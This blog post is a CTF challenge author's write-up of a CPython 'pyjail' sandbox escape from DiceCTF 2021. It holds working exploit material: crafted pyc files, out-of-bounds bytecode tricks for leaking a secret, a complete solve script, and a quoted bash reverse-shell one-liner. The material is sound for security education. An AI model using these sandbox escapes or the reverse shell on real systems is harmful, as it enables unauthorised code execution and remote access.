kmh's blog

TI-1337 Plus CE: Abusing CPython internals

Feb. 7, 2021

I wrote a pyjail for DiceCTF this weekend that I was pretty proud of:

The name was a reference to my last pyjail, the TI-1337. 7 teams (out of over 1,000) solved it, all using unintended but very cool solutions. I’ll go over my approach, and briefly describe the others when relevant.

Initial analysis

Texas Instruments just released the latest iteration of their best-selling TI-1337 series: the TI-1337 Plus Color Edition!

nc dicec.tf 31337

ti1337plusce.tar.gz

The archive file contains everything needed to deploy the challenge:

  • A Dockerfile
  • A patch to CPython (the Python interpreter)
  • The script we connect to
  • A fake flag

First, let’s take a look at the Dockerfile:

# build: docker build . -t ti1337plusce
# run: docker run --rm --name ti1337plusce -p 31337:1337 ti1337plusce
# connect: nc localhost 31337
# stop: docker kill ti1337plusce
FROM python:3.9.1-slim
RUN apt-get update && apt-get install -y socat git build-essential
WORKDIR /run
RUN git clone --single-branch --branch v3.9.1 --depth 1 https://github.com/python/cpython.git
WORKDIR /run/cpython
COPY patch.diff .
RUN git apply patch.diff && ./configure --prefix=/opt/python && export COMPILE_SECRET=`tr -dc A-Za-z0-9 < /dev/urandom | head -c 20` && make CFLAGS="-D FROZEN_SECRET=\\\"`tr -dc A-Za-z0-9 < /dev/urandom | head -c 20`\\\" -D COMPILE_SECRET=\\\"$COMPILE_SECRET\\\"" && unset COMPILE_SECRET
RUN python3 -m pip install colr
RUN echo 1337:x:1337:1337::: >> /etc/passwd
COPY ti1337plusce.py /run
RUN chmod +x /run/ti1337plusce.py && mkdir /tmp/ti1337 && chmod 733 /tmp/ti1337
COPY flag.txt /flag.txt
RUN mv /flag.txt /flag.`tr -dc A-Za-z0-9 < /dev/urandom | head -c 20`.txt
WORKDIR /tmp/ti1337
EXPOSE 1337
CMD while :; do socat TCP-LISTEN:1337,fork,reuseaddr,su=1337 EXEC:"/run/ti1337plusce.py"; done

A custom version of CPython is compiled with some randomized secrets passed to the C preprocessor after applying the patch. The flag is stored in a random filename, meaning a simple open('/flag.txt').read() won’t be enough, and we’ll need something closer to arbitrary code execution. Finally, the ti1337plusce.py script is served as an unprivileged user.

You can read the full server file, but I’ll give you the gist here:

  1. You enter a username, and a directory for that username is created.
  2. You enter a session name. If you choose to restore a session, the contents of the file with the session name in your user directory are loaded into code. Otherwise, code is an empty string.
  3. You enter input line-by-line, which is appended to code and then written to your session file after an empty input() call.
  4. Oh yeah, everything is rainbow.
  5. Your code is entered into an interactive session of the patched CPython binary. If the process exits with a non-zero return code, you get the message “Hey, that’s not math!” Otherwise stdout from the process is printed.

Finally, patch.diff has 2 major changes:

  • Code objects belonging to frozen modules (those serialized with marshal and compiled into CPython) have a secret filename (one of the randomized compile-time macros)
  • A large subset of CPython opcodes trigger exit(1) when the following condition is fulfilled:
if (
    (!getenv("COMPILE_SECRET") || strcmp(getenv("COMPILE_SECRET"), COMPILE_SECRET)) /* not during compilation */
    && strcmp(PyUnicode_AsUTF8(co->co_filename), FROZEN_SECRET) /* not a pre-compiled frozen module */
    && tstate->interp->runtime->initialized /* interpreter is initialized */
)

Here’s an explanation of each part:

  • Since there is some Python code run at the end of compilation, and I want the build to succeed, I set an environment variable, COMPILE_SECRET, while compiling. Because of this, leaking a string from the binary and setting the COMPILE_SECRET environment variable would be sufficient for bypassing the filter.

  • Frozen modules are also executed at the start of the Python REPL, even after the interpreter has been initialized. I used a secret filename for frozen code objects to allow arbitrary bytecode from those modules. Leaking the FROZEN_SECRET string and executing a code object with that filename would bypass the filter.

  • Before the interpreter is initialized, lots of bytecode is executed in the REPL. Setting that variable to false would also be sufficient for bypassing the filter.

In addition to all the banned opcodes, there are some restricted ones:

case LOAD_NAME:
case STORE_NAME:
case DELETE_NAME:
case LOAD_GLOBAL:
case STORE_GLOBAL:
case DELETE_GLOBAL:
    if (PyUnicode_AsUTF8(GETITEM(names, oparg))[0] == '_') exit(1);

We can’t load, store, or delete variable names that begin with an _. Lots of special stuff in python (like __builtins__) starts with an underscore, so this prevents potential non-calculator trickery.

Now let’s look at the opcodes we are allowed to use by scrolling through the Python docs. I won’t list them all out, but the notable ones are operations on variables (load, store, delete), math operations (add, divide, multiply, bitwise ops, etc.), comparison operators (!=, <, etc.), printing in the Python REPL, and import statements.

Import statements definitely stick out as dangerous. And with calculator sessions, we can write to arbitrary filenames to import from! Any self-respecting CPython nerd knows that an import statement can refer to 3 types of files: Python source code (.py), Python bytecode (.pyc), and shared libraries (.pyd, .so). I did not know an import statement could refer to a .so in your current directory before this weekend. So a solver has two options: write a shared object file (which executes machine code) to read the flag and import it, or make a pyc file that somehow bypasses the opcode filtering to read the flag and import it.

Note: There’s a lot of other analysis you could do and dead ends you’d probably hit when coming at it blind. I am presenting a highly romanticized solving experience.

Writing a simple pwn.so file seems like significantly less work, so let’s give it a shot.

[kmh@kmh ti1337]$ cat pwn.c
void PyInit_pwn() {
	system("cat /flag.*.txt");
	exit(0);
}
[kmh@kmh ti1337]$ gcc pwn.c -shared -o pwn.so
[kmh@kmh ti1337]$ python3 -c "import pwn"
cat: '/flag.*.txt': No such file or directory

Looking good!

[kmh@kmh ti1337]$ (cat - && cat pwn.so && cat -) | nc dicec.tf 31337
Welcome to the TI-1337 Plus CE!
Enter your username: kmh13377894219885
1. Start new session
2. Restore session
What would you like to do? 1
Session name: pwn
You can use variables and math operations. Results of expressions will be outputted.
Enter your calculations: 
> > > 
>

[kmh@kmh ti1337]$

Hmmm. socat doesn’t forward stderr, so let’s try it in a local Docker container.

root@e5f303d23014:~# (cat - && cat pwn.so && cat -) | /run/ti1337plusce.py 
Welcome to the TI-1337 Plus CE!
Enter your username: kmh13377894219887
1. Start new session
2. Restore session
What would you like to do? 1
Session name: pwn
You can use variables and math operations. Results of expressions will be outputted.
Enter your calculations: 
> > > 
> 
Traceback (most recent call last):
  File "/run/ti1337plusce.py", line 54, in <module>
    f.write(code)
UnicodeEncodeError: 'utf-8' codec can't encode character '\udca0' in position 40: surrogates not allowed

Turns out since input() returns a Python 3 string, which defaults to UTF-8 encoding, it does a fancy surrogateescape thing where bytes that are not valid UTF-8 are transformed from “\xNN” to “\uDCNN”. This is okay because code points U+D800 through U+DFFF are prohibited in UTF-8, as they are reserved surrogate pairs in UTF-16 and don’t refer to actual characters. But when the session file in the calculator is opened with open(name, "w"), the encoding is UTF-8 without the surrogateescape error handler. Our input needs to be valid UTF-8 to avoid getting a “surrogates not allowed” error when writing. We now have two options: I continue to pretend that I knew Python could import .so files from the current directory and pursue an artisinal, hand-crafted shared object that I do not know how to make, or we dive into the bytecode solution. I’ll go with the latter.

You can check out st98’s UTF-8 ELF made with NASM here.

UTF-8 pyc files

The same UTF-8 encoding restrictions apply when we’re importing pyc files. Luckily, the file format is much simpler. Let’s generate a pyc file and check it out.

[kmh@kmh ti1337]$ echo "a = 1" > pwn.py
[kmh@kmh ti1337]$ python3 -c 'from py_compile import *; compile("pwn.py", invalidation_mode=PycInvalidationMode.UNCHECKED_HASH)'
[kmh@kmh ti1337]$ hexdump -C __pycache__/pwn.cpython-39.pyc 
00000000  61 0d 0d 0a 01 00 00 00  18 af 88 23 4b 3b 38 00  |a..........#K;8.|
00000010  e3 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000020  00 01 00 00 00 40 00 00  00 73 08 00 00 00 64 00  |.....@...s....d.|
00000030  5a 00 64 01 53 00 29 02  e9 01 00 00 00 4e 29 01  |Z.d.S.)......N).|
00000040  da 01 61 a9 00 72 03 00  00 00 72 03 00 00 00 fa  |..a..r....r.....|
00000050  06 70 77 6e 2e 70 79 da  08 3c 6d 6f 64 75 6c 65  |.pwn.py..<module|
00000060  3e 01 00 00 00 f3 00 00  00 00                    |>.........|
0000006a

Referencing the marshal source will be useful here, as pyc files are a header followed by a marshalled code object. We’ll also want to know the basic rules behind UTF-8. UTF-8 encodes code points ranging from U+0000 to U+10FFFF, but most text you encounter will fall in the range 0 to 127, which has the same mapping as ASCII. In order to not inflate the size of files that only contain those characters, UTF-8 is a variable length encoding and bytes under 128 are interpreted as single bytes. Bytes outside that range use their upper bits to indicate how many bytes that follow are part of the same code point. A sequence of bytes 110xxxxx 10xxxxxx represents a code point up to U+07FF using the x bits. 1110xxxx 10xxxxxx 10xxxxxx and 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx work the same way. The relevant information for us is that any byte greater than or equal to 128 must follow another large byte. We’ll try to stay under 128 for convenience.

The first 8 bytes in the file aren’t a problem because as they’re all under 128. The next 8 can be zeroed out because they are normally used to check whether a pyc file needs to be regenerated, but we used the UNCHECKED_HASH invalidation mode and Python won’t care if they’re wrong. Next up should be our marshalled code object, but for some reason the byte, 0xe3, doesn’t match the TYPE_CODE constant in marshal.c!

#define TYPE_DICT               '{'
#define TYPE_CODE               'c'
#define TYPE_UNICODE            'u'

Closer investigation reveals that there is a FLAG_REF bit packed into the type value:

flag = code & FLAG_REF;
type = code & ~FLAG_REF;

That flag is ‘\x80’ and, fortunately, all the type constants are under 128. Let’s 0 it out for now (change e3 to 0xe3 & ~0x80 = 63) and see if it causes any issues. And while we’re at it, let’s trace through the marshal code as we read the file and unmark all the other marshal types with FLAG_REF set. In this case, that is all of the bytes in the pyc greater than 127, so let’s see what happens:

[kmh@kmh ti1337]$ hexdump -C __pycache__/pwn.cpython-39.pyc 
00000000  61 0d 0d 0a 01 00 00 00  18 2f 08 23 4b 3b 38 00  |a......../.#K;8.|
00000010  63 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |c...............|
00000020  00 01 00 00 00 40 00 00  00 73 08 00 00 00 64 00  |.....@...s....d.|
00000030  5a 00 64 01 53 00 29 02  69 01 00 00 00 4e 29 01  |Z.d.S.).i....N).|
00000040  5a 01 61 29 00 72 03 00  00 00 72 03 00 00 00 7a  |Z.a).r....r....z|
00000050  06 70 77 6e 2e 70 79 5a  08 3c 6d 6f 64 75 6c 65  |.pwn.pyZ.<module|
00000060  3e 01 00 00 00 73 00 00  00 00                    |>....s....|
0000006a
[kmh@kmh ti1337]$ python3 -c "import pwn; print(pwn.a)"
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<frozen importlib._bootstrap>", line 1007, in _find_and_load
  File "<frozen importlib._bootstrap>", line 986, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 680, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 786, in exec_module
  File "<frozen importlib._bootstrap_external>", line 918, in get_code
  File "<frozen importlib._bootstrap_external>", line 587, in _compile_bytecode
ValueError: bad marshal data (invalid reference)

Apparently those reference were important… anything with that bit set is stored by marshal into a references list that can be accessed with TYPE_REF (0x72). There are two reference accesses, at 0x45 and 0x4a, both to index 3. The 4th reference generated in the original pyc is an empty tuple (a9 00), so let’s replace those references with new tuples:

[kmh@kmh ti1337]$ hexdump -C __pycache__/pwn.cpython-39.pyc 
00000000  61 0d 0d 0a 01 00 00 00  18 2f 08 23 4b 3b 38 00  |a......../.#K;8.|
00000010  63 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |c...............|
00000020  00 01 00 00 00 40 00 00  00 73 08 00 00 00 64 00  |.....@...s....d.|
00000030  5a 00 64 01 53 00 29 02  69 01 00 00 00 4e 29 01  |Z.d.S.).i....N).|
00000040  5a 01 61 29 00 29 00 29  00 7a 06 70 77 6e 2e 70  |Z.a).).).z.pwn.p|
00000050  79 5a 08 3c 6d 6f 64 75  6c 65 3e 01 00 00 00 73  |yZ.<module>....s|
00000060  00 00 00 00                                       |....|
00000064
[kmh@kmh ti1337]$ python3 -c "import pwn; print(pwn.a)"
1

Perfect. We can now write this to a session file on the calculator server, import it, and, by modifying co_code, execute arbitrary bytecode.

Unrestricted bytecode execution

Our bytecode is still limited by the restrictions in the patch. If we want to do anything useful, like the read the flag, we’ll need to either use memory corruption in the Python interpreter or trigger one of the conditions outlined in the analysis phase. (I have been proven wrong by justCatTheFish. We’ll carry on regardless.) Both approaches could use the same building blocks, but the second is much easier so we’ll go with that. The basic premise is that the CPython interpreter (understandably) does very few bounds checks. For example, look at the LOAD_CONST implementation:

#define PyTuple_GET_ITEM(op, i) (_PyTuple_CAST(op)->ob_item[i])
...
#define GETITEM(v, i) PyTuple_GET_ITEM((PyTupleObject *)(v), (i))
...
case TARGET(LOAD_CONST): {
    PREDICTED(LOAD_CONST);
    PyObject *value = GETITEM(consts, oparg);
    Py_INCREF(value);
    PUSH(value);
    FAST_DISPATCH();
}

oparg is read directly from the code object, which we control through the pyc, so we can theoretically load any object with a pointer in memory if we know the offset from the consts array. FROZEN_SECRET is stored inside PyUnicodeObjects in frozen code objects (see patch.diff). If we load one of those and leak it with PRINT_VALUE (the opcode the Python REPL uses for printing values), we can use it as the co_filename property in the marshalled code object of our pyc and gain access to every opcode.

Let’s hop in GDB and pray the offset is consistent! Fortunately, all empty tuples reference the same Python object, and frozen code objects are unmarshalled early in CPython’s launch, so as long as our consts array is an empty tuple, the addresses are entirely determined before user code is run and the offset will stay the same between runs.

First we’ll get the address of a frozen function:

gef➤  r -S -i
Starting program: /home/kmh/Development/angstromctf/problems/2020/misc/ti1337plusce/cpython/python -S -i
Python 3.9.1 (tags/v3.9.1-dirty:1e5d33e, Feb  5 2021, 14:02:33) 
[GCC 10.2.0] on linux
>>> from _frozen_importlib import module_from_spec
>>> module_from_spec
<function module_from_spec at 0x7f75fe544d30>

Then we’ll get the address of a pointer to its filename object:

gef➤  p &((PyCodeObject*)((PyFunctionObject*)0x7f75fe544d30)->func_code)->co_filename
$1 = (PyObject **) 0x7f75fe534a38

Now we can break at the opcode evaluation function, where we access the empty tuple object through the co_names field and calculate the number of indices the filename pointer is away from the ob_item array:

gef➤  b _PyEval_EvalFrameDefault
Breakpoint 1 at 0x5555555ad800: file Python/ceval.c, line 919.
gef➤  c
Continuing.
>>> 1
[#0] Id 1, Name: "python", stopped 0x562a16f9c640 in _PyEval_EvalFrameDefault (), reason: BREAKPOINT
gef➤  p/d (0x7f75fe534a38 - (long)((PyTupleObject*)f->f_code->co_names)->ob_item)/8
$2 = -19652

This means that LOAD_CONST, when consts is an empty tuple, has a reference to a PyUnicodeObject containing FROZEN_SECRET at index -19652. So we need to execute the bytecode LOAD_CONST (-19652); PRINT_VALUE. Unfortunately, oparg is stored as a 4 byte integer, and opcodes only take single byte arguments, so we will need to use the EXTENDED_ARG opcode which is defined as a constant greater than 127. We could still maybe figure something out since UTF-8 doesn’t ban bytes over 127; it just has special requirements. But -19652 is 0xffffb33c, and 0xff can never appear in UTF-8. If you reread my brief encoding explanation or check Wikipedia you’ll see that every valid byte contains a 0 bit.

Fortunately there are mechanisms for storing bytes in memory without inputting them directly. The simplest is bytestrings:

gef➤  r
Starting program: /run/cpython/python -S -i
Python 3.9.1 (tags/v3.9.1-dirty:1e5d33e, Feb  5 2021, 19:35:48) 
[GCC 8.3.0] on linux
>>> a = b'\xff\xf1\xff\xf3\xff\xf5\xff\xf7\xff\xf9\xff\xfb\xff\xfd\xff'
gef➤  search-pattern 0xfffdfffbfff9fff7fff5fff3fff1
[+] Searching '\xf1\xff\xf3\xff\xf5\xff\xf7\xff\xf9\xff\xfb\xff\xfd\xff' in memory
[+] In (0x7f857336a000-0x7f857346a000), permission=rw-
  0x7f8573389979 - 0x7f85733899b1  →   "\xf1\xff\xf3\xff\xf5\xff\xf7\xff\xf9\xff\xfb\xff\xfd\xff[...]" 
  0x7f85733a2559 - 0x7f85733a2591  →   "\xf1\xff\xf3\xff\xf5\xff\xf7\xff\xf9\xff\xfb\xff\xfd\xff[...]" 

We can abuse another bytecode operation without bounds checks: jumps.

#define JUMPTO(x)       (next_instr = first_instr + (x) / sizeof(_Py_CODEUNIT))
...
case TARGET(JUMP_ABSOLUTE): {
    PREDICTED(JUMP_ABSOLUTE);
    JUMPTO(oparg);
    ...
}

To make this useful, we need our evil bytecode, inputted as a bytestring, to be at a predictable offset from our code object so we can reliably jump into it. This is more complicated than finding the offset between the empty tuple and FROZEN_SECRET because it relies on the allocations in code we input. After banging my head a bit, I realized the unmarshalling of a code object allocates a PyBytesObject for the bytecode, which is the same object used by bytestrings. I can allocate a bunch of bytestrings with my evil bytecode:

A0 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"
A1 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"
A2 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"
...
A97 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"
A98 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"
A99 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"

And then free half of them:

del A0
del A2
del A4
...
del A94
del A96
del A98

The allocated bytestrings will be mostly sequential in memory, so the heap might look like this:

<evil bytecode>
<chunk in freelist>
<evil bytecode>
<chunk in freelist>
...
<chunk in freelist>
<evil bytecode>

Even if there are some intermediate allocations, it is very likely that another buffer of the same length as our evil bytecode (in this case, 16 bytes) would use a freed chunk in front of one of the buffers we want to jump into. So if we unmarshal a code object whose co_code is 16 bytes long, we should have a constant offset. The exact value of the offset depends on metadata and implementation details, but checking in GDB shows it to be 0x40 bytes. After following the allocate/free procedure above and importing a pyc file with JUMP_ABSOLUTE (0x40), we’ve successfully leaked FROZEN_SECRET:

import uuid
import socket
import re

u = bytes(str(uuid.uuid4()).replace("-", ""), encoding="utf-8")

def run(session, code, option=b"1"):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(("dicec.tf", 31337))
	s.sendall(u+b"\n")
	s.sendall(option+b"\n")
	s.sendall(session+b"\n")
	s.sendall(code+b"\n")
	r = True
	output = ""
	while r:
		r = s.recv(4096)
		output += r.decode("utf-8")
	return output

run(b"a.py", b"1+1\n")
run(b"b", b"import a\n2+2\n")
run(b"c.py", b"a = 1337\n")
run(b"__pycache__/c.cpython-39.pyc", open("payload.pyc", "rb").read()+b"\n")
leak = run(b"d", b"\n".join('A{} = b"{}"'.format(i, '\\x90\\xff\\x90\\xff\\x90\\xb3\\x64\\x3c\\x46\\x00\\x53\\x00'+'\\xff'*4).encode("utf-8") for i in range(100))+b"\n"+b"\n".join("del A{}".format(i).encode("utf-8") for i in range(0, 100, 2))+b"\n"+b"import c\n")
frozen = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])').sub('', leak).split("'")[1]
print(frozen)
ErBT0ksQUDyGuWIT42Bw

A couple details I skipped over: I created the __pycache__ folder by importing a py file (which it turns out isn’t necessary since you can import pwn.pyc with import pwn) and removed the rainbow ANSI escape codes with a regex from Stack Overflow.

We can now change co_filename to be the leaked string in a pyc file, upload that as flag.pyc, and then do import flag. You actually can’t overwrite a file in __pycache__ for this because they automatically fix the name for you based on the path.

Another way to leak

ALLES! found another fun way to leak co_filename of a frozen code object (I’ve dumped their payload from the server):

>>> dis.dis(marshal.loads(open("jdxvpDpUMSmJhoNpToLJ.pyc", "rb").read()[16:]))
  1           0 LOAD_CONST               0 (0)
              2 LOAD_CONST               1 (None)
              4 IMPORT_NAME              0 (sys)
              6 STORE_NAME               0 (sys)

  3           8 LOAD_NAME                0 (sys)
             10 IMPORT_FROM              1 (last_traceback)
             12 IMPORT_FROM              2 (tb_next)
             14 IMPORT_FROM              3 (tb_frame)
             16 IMPORT_FROM              4 (f_code)
             18 IMPORT_FROM              5 (co_filename)
             20 STORE_GLOBAL             6 (a)
             22 LOAD_CONST               1 (None)
             24 RETURN_VALUE

Turns out IMPORT_FROM is just LOAD_ATTR in disguise!

static PyObject *
import_from(PyThreadState *tstate, PyObject *v, PyObject *name)
{
    PyObject *x;

    if (_PyObject_LookupAttr(v, name, &x) != 0) {
        return x;
    }
    ...

And it’s easy to trigger an exception in a frozen module by importing something that doesn’t exist, which can then be accessed through sys.last_traceback:

import aa
from jdxvpDpUMSmJhoNpToLJ import a
a

Their full solution code is available here. I could have prevented this solution by disallowing IMPORT_FROM, but then the inclusion of IMPORT_NAME becomes even more contrived, and this is a cool piece of trivia, so I have no regrets.

Finishing up

Now that we have unrestricted bytecode execution, it should be as simple as import os; os.system("cat /flag-*"), right? Wrong!

[kmh@kmh ~]$ nc dicec.tf 31337
Welcome to the TI-1337 Plus CE!
Enter your username: kmh13377894219885
1. Start new session
2. Restore session
What would you like to do? 1
Session name: 1
You can use variables and math operations. Results of expressions will be outputted.
Enter your calculations: 
> import os
> 
Hey, that's not math!

Code in os still hits the opcode filtering switch statement. Fortunately, CPython comes in with a bunch of modules written in C that don’t go through the Python interpreter. One of these is the posix, which is what implements most of the functionality of os. Here’s the final pyc:

00000000  61 0d 0d 0a 01 00 00 00  00 00 00 00 00 00 00 00  |a...............|
00000010  63 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |c...............|
00000020  00 03 00 00 00 40 00 00  00 73 1a 00 00 00 64 00  |.....@...s....d.|
00000030  64 01 6c 00 5a 00 65 00  09 c3 a0 01 64 02 09 c3  |d.l.Z.e.....d...|
00000040  a1 01 01 00 64 01 53 00  29 03 69 00 00 00 00 4e  |....d.S.).i....N|
00000050  7a 04 6c 73 20 2f 29 02  5a 05 70 6f 73 69 78 5a  |z.ls /).Z.posixZ|
00000060  06 73 79 73 74 65 6d 29  00 29 00 29 00 7a 14 69  |.system).).).z.i|
00000070  44 52 69 35 4d 77 36 79  58 49 34 58 63 54 48 66  |DRi5Mw6yXI4XcTHf|
00000080  68 32 41 5a 08 3c 6d 6f  64 75 6c 65 3e 01 00 00  |h2AZ.<module>...|
00000090  00 73 02 00 00 00 08 01                           |.s......|
00000098

And the rest of the solve script:

run(b"e.pyc", open("flag.pyc", "rb").read().replace(b"iDRi5Mw6yXI4XcTHfh2A", frozen.encode("utf-8"))+b"\n")
flag = "/flag."+re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])').sub('', run(b"f", b"import e\n")).split("flag.")[1].split(".")[0]+".txt"
run(b"g.pyc", open("flag.pyc", "rb").read().replace(b"iDRi5Mw6yXI4XcTHfh2A", frozen.encode("utf-8")).replace(b"z\x04ls /", b"z"+bytes((4+len(flag),))+b"cat "+flag.encode("utf-8"))+b"\n")
print(run(b"h", b"import g\n"))

And, finally, the flag:

[kmh@kmh solve]$ python3 solve.py 
Welcome to the TI-1337 Plus CE!
Enter your username: 1. Start new session
2. Restore session
What would you like to do? Session name: You can use variables and math operations. Results of expressions will be outputted.
Enter your calculations: 
> > dice{a_ja1lbr0k3n_calcul4t0r?!}

All that work was unnecessary…

justCatTheFish blew my mind with this solution:

from sys import __dict__ as sysd
from __main__ import __dict__ as myd
from posix import system as displayhook; sysd |= myd; 'bash -c "bash -i >& /dev/tcp/xx.xx.xx.xx/nnnn 0>&1"';

Another clever use of IMPORT_FROM! By importing __dict__ from the main module (which contains variables you assign) and another module and “or"ing them, you can write into the namespace of the other module. The function used to print in the Python REPL is a global in the sys module, so changing that to posix.system pops a shell. I’m super happy with this as an unintended solution and not disappointed at all.

Their full write-up and thought process, which you should totally read, is available here. They even wrote a tool to generate UTF-8 pyc files!

disconnect3d from justCatTheFish also pointed out that you could use an evil .so without importing it because interactive CPython automatically attempts to load a readline module from the current working directory. So really the challenge only needed to allow file writing or imports to be solvable!

Reflections

This was the first CTF I’ve helped organize that had more than a couple top teams playing, and it was super gratifying to have them work on and solve my challenge. Despite the solves being unintended, I’m not sure their solutions were significantly easier than mine, considering it got the same number of solves as a kernel pwn. I also don’t know how I would remove the possibility of the shared object approach—I tried to make the challenge setup reasonably motivated by the premise, and I don’t want to add random patches for the sole purpose of eliminating other solution paths. Challenges that are exploratory and allow for multiple approaches are often cooler anyway.

Ultimately, I believe TI-1337 Plus CE lived up to the hype!